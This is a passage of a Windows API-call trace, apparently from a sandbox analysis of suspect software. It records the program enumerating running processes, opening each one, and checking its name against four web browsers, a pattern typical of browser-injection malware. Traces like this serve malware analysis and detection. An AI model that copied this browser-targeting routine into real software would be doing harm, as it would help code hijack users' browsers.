	[0253.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa954
	[0253.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.549] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0253.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.550] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.550] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0253.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.550] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.550] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.551] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa958
	[0253.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.551] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.552] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.552] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.552] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0253.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa95c
	[0253.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.553] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.554] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.554] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.555] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0253.555] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa960
	[0253.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.556] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0253.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.556] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.556] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0253.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.557] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.557] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa964
	[0253.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.558] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.558] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.558] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.559] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.559] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0253.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa968
	[0253.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.560] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0253.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.560] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.561] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0253.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.561] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.561] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0253.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa96c
	[0253.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.562] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0253.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.563] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.570] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0253.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.570] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.571] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0253.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa970
	[0253.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.572] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0253.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.572] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.572] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0253.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.572] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.573] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0253.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa974
	[0253.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.574] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0253.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.574] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.574] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0253.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.575] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.575] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0253.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0253.576] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0253.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa978
	[0253.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.577] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0253.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.577] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.578] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0253.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.581] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.581] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0253.582] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa97c
	[0253.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.582] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0253.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.583] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.583] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0253.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.583] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0253.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa980
	[0253.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.584] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0253.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.585] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.585] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0253.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.586] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.586] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0253.586] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa984
	[0253.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.587] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0253.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.587] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.587] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0253.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.588] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.588] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0253.589] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa988
	[0253.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.589] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0253.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.590] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.590] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0253.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.591] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.591] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0253.592] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa98c
	[0253.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.592] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0253.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.592] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.593] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0253.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.593] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.593] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0253.594] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa990
	[0253.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.594] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0253.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.600] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.601] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0253.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.602] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.602] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0253.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa994
	[0253.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.603] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0253.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.604] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.604] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0253.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.605] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.605] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0253.606] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa998
	[0253.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.606] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0253.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.606] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.607] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0253.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.607] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.607] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0253.608] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa99c
	[0253.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.608] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0253.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.608] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.609] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0253.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.609] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.609] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0253.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa9a0
	[0253.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.610] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0253.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.611] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.611] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0253.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.612] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.612] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0253.613] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa9a4
	[0253.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.613] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0253.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.614] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.614] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0253.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.615] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.615] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0253.616] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa9a8
	[0253.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.616] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0253.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.617] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.617] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0253.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.618] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.618] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0253.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa9ac
	[0253.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.619] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0253.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.620] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.620] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0253.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.621] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.622] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0253.622] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa9b0
	[0253.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.623] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0253.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.623] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.624] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0253.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.624] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.624] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0253.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa9b4
	[0253.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.626] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
